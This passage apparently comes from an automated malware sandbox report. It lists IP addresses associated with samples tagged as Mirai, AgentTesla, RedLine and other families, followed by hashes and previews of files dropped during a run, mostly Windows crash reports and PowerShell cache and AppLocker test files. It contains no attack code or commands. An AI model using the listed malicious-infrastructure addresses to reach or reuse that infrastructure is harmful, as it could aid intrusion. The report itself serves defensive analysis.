                              • 154.216.20.140
                              mpsl.elfGet hashmaliciousMiraiBrowse
                              • 156.254.70.160
                              ppc.elfGet hashmaliciousMiraiBrowse
                              • 156.254.70.191
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0eSC.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              file.exeGet hashmaliciousCredential FlusherBrowse
                              • 195.201.57.90
                              QUOTATIONS#08670.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 195.201.57.90
                              1.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              2.cmdGet hashmaliciousUnknownBrowse
                              • 195.201.57.90
                              download_2.exeGet hashmaliciousQuasarBrowse
                              • 195.201.57.90
                              PVUfopbGfc.exeGet hashmaliciousLummaCBrowse
                              • 195.201.57.90
                              gp4uQBDTP8.exeGet hashmaliciousXehook StealerBrowse
                              • 195.201.57.90
                              dNNMgwxY4f.exeGet hashmaliciousXehook StealerBrowse
                              • 195.201.57.90
                              tYeFOUhVLd.exeGet hashmaliciousRedLineBrowse
                              • 195.201.57.90
                              No context
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.508847938127399
                              Encrypted:false
                              SSDEEP:192:XTzGXmG78Pd0eLDkja1TyLwMl9ulg6zuiFqZ24lO8n:fGWG78WeLDkjOTVS98g6zuiFqY4lO8n
                              MD5:4391ED1E5A19340B6630348F5C11D0D4
                              SHA1:D55AE9ED394CA581A5E049A27591A0507FCCD723
                              SHA-256:19082D92B2DD2D7E97066E9E5F0862339D8047F73D08588FF760F1A4FD4A2922
                              SHA-512:DFED3999C7495053560FC699D47D4A267F98E0F27A8A1D375480AD90E55A971EF1CABC5D9032811153AD02AFD61C67C77238BCE2B9A5BB58AF56AF26C082487E
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.7.0.5.7.4.7.6.0.3.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.7.0.6.6.2.2.5.9.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.d.b.4.6.8.f.-.f.d.2.1.-.4.1.1.4.-.b.f.3.d.-.c.1.f.1.6.a.f.8.e.7.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.3.7.e.4.5.c.2.-.0.5.7.a.-.4.e.3.5.-.b.d.4.2.-.7.b.2.f.f.2.b.2.0.a.1.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.4.-.f.f.d.6.-.4.d.7.4.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):1.5092902310167633
                              Encrypted:false
                              SSDEEP:192:HIj8mGW8Pd0eLDkja1TyeNRJlxlg6zuiFqZ24lO8n:07GW8WeLDkjOTZRrTg6zuiFqY4lO8n
                              MD5:F7789864FEB5A22E4070C43B570CC520
                              SHA1:4032F472ADCC7D8C674BE02C005971E62CFD75EA
                              SHA-256:003EDA9EEBB4444F56BD005239A40200DFC9B9CD49B84F91E6E9DF2CD51FF2AF
                              SHA-512:37216761C6C5FAAFC4AC24AD1720764954CB9BB268222EFF416F11B6EB1E8644FB868BA37862C79DCB69F8C9FF80B7C70FB9548BA6374DE5019B7A1CB1867FA1
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.4.3.3.6.5.4.0.0.7.9.7.1.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.4.3.3.6.5.4.9.1.4.2.2.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.2.4.2.9.1.a.7.-.4.5.8.6.-.4.7.1.e.-.9.9.9.6.-.5.9.9.b.c.f.7.9.e.6.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.8.b.3.d.a.a.1.-.6.e.4.f.-.4.3.1.2.-.8.6.8.b.-.2.5.5.f.1.0.4.9.2.1.1.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.8.-.0.0.0.1.-.0.0.1.4.-.2.7.5.5.-.f.4.5.4.9.3.1.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:55:06 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):903756
                              Entropy (8bit):3.493826044003654
                              Encrypted:false
                              SSDEEP:6144:fihBnsP1BxWFtGb/zxSLBKqXGk5HeBd2PsuEFqR3QA1z:fijtGb/zxSLccABd2PsukqFQQ
                              MD5:CBC6FAC040DAA4BF3221E1557FD51EA9
                              SHA1:AB16490964FC63275B84ADA8FD4472FB539B0CBE
                              SHA-256:BC520673455786E0F5F95D49A52EF252C7811D2929BA26F2F399B774B7864A8A
                              SHA-512:2BFE989F54DB8350186E3598AE5C308DEE17A7F4ED126FF7DA12E042DF3682F820868DDA804E295F2B7B8FABFEE4DB2D6693AA2389DD8498A3ACEC44924C7061
                              Malicious:false
                              Preview:MDMP..a..... .......*..f............$............'..8........5...2..........,...........`.......8...........T............]..Tl..........ph..........\j..............................................................................eJ.......j......Lw......................T...........#..f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8586
                              Entropy (8bit):3.696039447137576
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJPMd6Yp5cgmfZaPNpWEp89bZZ1fiHTm:R6lXJEd6Y3cgmfQPyZLfiq
                              MD5:12FD5EF54D3BB05428D4EB262A818F40
                              SHA1:1804E29BA4AAAE9D15870F6DB8D315B032EFCC9C
                              SHA-256:CFAA90AD5F81A54CBE79D1E3B448C450906BB7BE25CE747A2208DB1CEAD51A68
                              SHA-512:00E7DE8C676520700F0F859B4D2BDBC08A54A5508531BA4245A08E8D72FC27CD3E2684ABD36EADFCB66BDE3277BD65537BFBE5C468124CB483E2A8B0ECE5CB59
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.0.<./.P.i.
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4777
                              Entropy (8bit):4.440872292582251
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseXPJg771I9VKWpW8VYtYm8M4JQ9AHVSFsyq8vlAHVAytf2id:uIjfgI7er7VpJQ0VbWMVAuf2id
                              MD5:4C5E76FD920D5A99F0742F8CDAE221EA
                              SHA1:A587221176804BF4DDF156844CF9A0E1F772BC81
                              SHA-256:5CCFE39C00CE9C5354566EEE3680E4BC22B057768AD24718A9699EEF66E7ACF2
                              SHA-512:0F645A19E1908CBB32237C51C4A461A8C799C227287D501E5AE7D4F2D4A385E14DA2556F03E48CEFFEAAEB86B33612C96D2630984A606FC4E9D43485DFC6BDFA
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527277" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Mini DuMP crash report, 15 streams, Thu Oct 3 12:54:14 2024, 0x1205a4 type
                              Category:dropped
                              Size (bytes):900453
                              Entropy (8bit):3.4878249338619844
                              Encrypted:false
                              SSDEEP:6144:TkaDyOnLcxBuDAZc7wqdkRIzxuolEq/fR2UvAAeGq++i3QpRvm:+SoKKc/kRAJHR2UvAANq+bQp
                              MD5:9C9E5A4B5F5EC1803D075C818F4D5F58
                              SHA1:D140E2A96FAB2410F3EF39A102F88C976509BB9C
                              SHA-256:0B34AD5EC4050CEFCA2EEC14511A5F0AEAF67A2E5A901D0F9D0CAD56CC3EF235
                              SHA-512:9FF5024678BAE2C3308EA68582B78EEDFC8859BE49320E34A773293F8D5201D3E8D66DD8367D92C9515D3CAB08C6C45BC825C2443B6F2CC8EFA65A44DFBC3006
                              Malicious:false
                              Preview:MDMP..a..... ..........f............$............'..8........5...2..........D...........`.......8...........T............]..._...........h..........tj..............................................................................eJ.......k......Lw......................T.......(.....f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):8778
                              Entropy (8bit):3.6979020144065333
                              Encrypted:false
                              SSDEEP:192:R6l7wVeJ66z6YYDmwgmfZaPNpWEu89bL5UfjD5m:R6lXJfz6YSmwgmfQPTLafk
                              MD5:569CEC5C2B5660BCFC384A1C04FB91FD
                              SHA1:461C2205C0B94C65C7653EFEE2D2A9B296D1EAFD
                              SHA-256:C37BAFBC237122E1D18AECCF420BCC0C6032071DBAC78CD09137F64760A51068
                              SHA-512:4E7F25493ED0DEF28D3458A89C1442515CDEEFBB8D38B088B339EFD9319588356DAB6706986EE9CEC7C50C3DA4DB9C37F35053A0574EBBF59B7D56D529158EAC
                              Malicious:false
                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.2.0.<./.P.i.
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):4777
                              Entropy (8bit):4.442746673001936
                              Encrypted:false
                              SSDEEP:48:cvIwWl8zseXgJg771I9VKWpW8VYsNYm8M4JQ9AHVSFpyq8vlAHVEsytfkd:uIjfbI7er7V2JQ0VWWMVEsufkd
                              MD5:CA10CF4267EA920B6382F5F57DBECA1C
                              SHA1:4A67A7CFED178A08BA9D85B5EF79547EB47F3C98
                              SHA-256:B6123548BD794739EE3BED74F3B4248E38992DB5F9743E380B2AEDFA7A696FDB
                              SHA-512:CE54F8313EEFAB091FF7F68BB521A3A6E22E28CCE7B5C3C0ED266688D270A10C8DBBC5D69B20AB9FFE725FB50B78B66687F533F5425CBED8ED65317AEA31727A
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="527276" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                              Category:dropped
                              Size (bytes):71954
                              Entropy (8bit):7.996617769952133
                              Encrypted:true
                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                              Malicious:false
                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):328
                              Entropy (8bit):3.150184159866505
                              Encrypted:false
                              SSDEEP:6:kKyZi9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:KvDnLNkPlE99SNxAhUe/3
                              MD5:6D2DD7670E6C6E13098A62A173040B90
                              SHA1:2D3780590D9A7A69945646EFD25E816F89A9B312
                              SHA-256:FE76AFC2A65F4926A80E430971D20FAC05E5A28A1B3A0230D4948FBC9736A3EF
                              SHA-512:3CA40528A4A10B47A6C6A1486F7648750C0352ECC01D782F465A1AE8F234B8BDE22E98AEDE452242407D508CDEF1B3C424289716C704CE863ADAA72FD73DF911
                              Malicious:false
                              Preview:p...... ...............(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9713
                              Entropy (8bit):4.940954773740904
                              Encrypted:false
                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smu9:9rib4ZIkjh4iUxsNYW6Ypib47
                              MD5:BA7C69EBE30EC7DA697D2772E36A746D
                              SHA1:DA93AC7ADC6DE8CFFED4178E1F98F0D0590EA359
                              SHA-256:CFCE399DF5BE3266219AA12FB6890C6EEFDA46D6279A0DD90E82A970149C5639
                              SHA-512:E0AFE4DF389A060EFDACF5E78BA6419CECDFC674AA5F201C458D517C20CB50B70CD8A4EB23B18C0645BDC7E9F326CCC668E8BADE803DED41FCDA2AE1650B31E8
                              Malicious:false
                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2916
                              Entropy (8bit):5.377699439087756
                              Encrypted:false
                              SSDEEP:48:4t1AzsSU4YymI4RIoUeCa+m9qr9t5/78NfpHQDGxJZaxIZVEouNHJBVrH/jCB:IAzlHYvIIfLz9qrh7KfpRJlPEo2dL8
                              MD5:8CA36DE9B60A2DD57F287DE38180228E
                              SHA1:376C5188B514F8DE60DB1034E1A85095A7003BB5
                              SHA-256:E2AC2D8BA3AF5D117EE85FD3AB86E6F7A5EA5831ADCB50A0AF443DCC365AA7AB
                              SHA-512:E3DD1EE96FF77EEDCD24E612936723CA34A28C035DAA88D21814A15C6EC71C6E4C98EA161C0A366D4C8CA9F5D672244F5A6C387E2D9847E9E04211ADD84528B7
                              Malicious:false
                              Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
